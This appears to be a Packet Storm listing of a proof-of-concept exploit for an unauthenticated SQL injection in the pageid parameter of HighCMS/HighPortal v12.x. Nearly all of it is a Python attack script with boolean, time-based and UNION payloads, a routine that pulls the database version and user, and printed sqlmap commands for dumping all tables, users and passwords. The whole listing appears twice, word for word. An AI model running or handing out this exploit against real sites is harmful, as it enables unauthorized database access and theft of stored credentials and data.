Description
HighPortal version 12.x remote SQL injection proof of concept exploit...
Basic Information
ID
PACKETSTORM:212925
Published
Dec 17, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : HighPortal v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighPortal version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighPortal v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
HighCMS/HighPortal v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : HighPortal v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighPortal version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighPortal v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
HighCMS/HighPortal v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================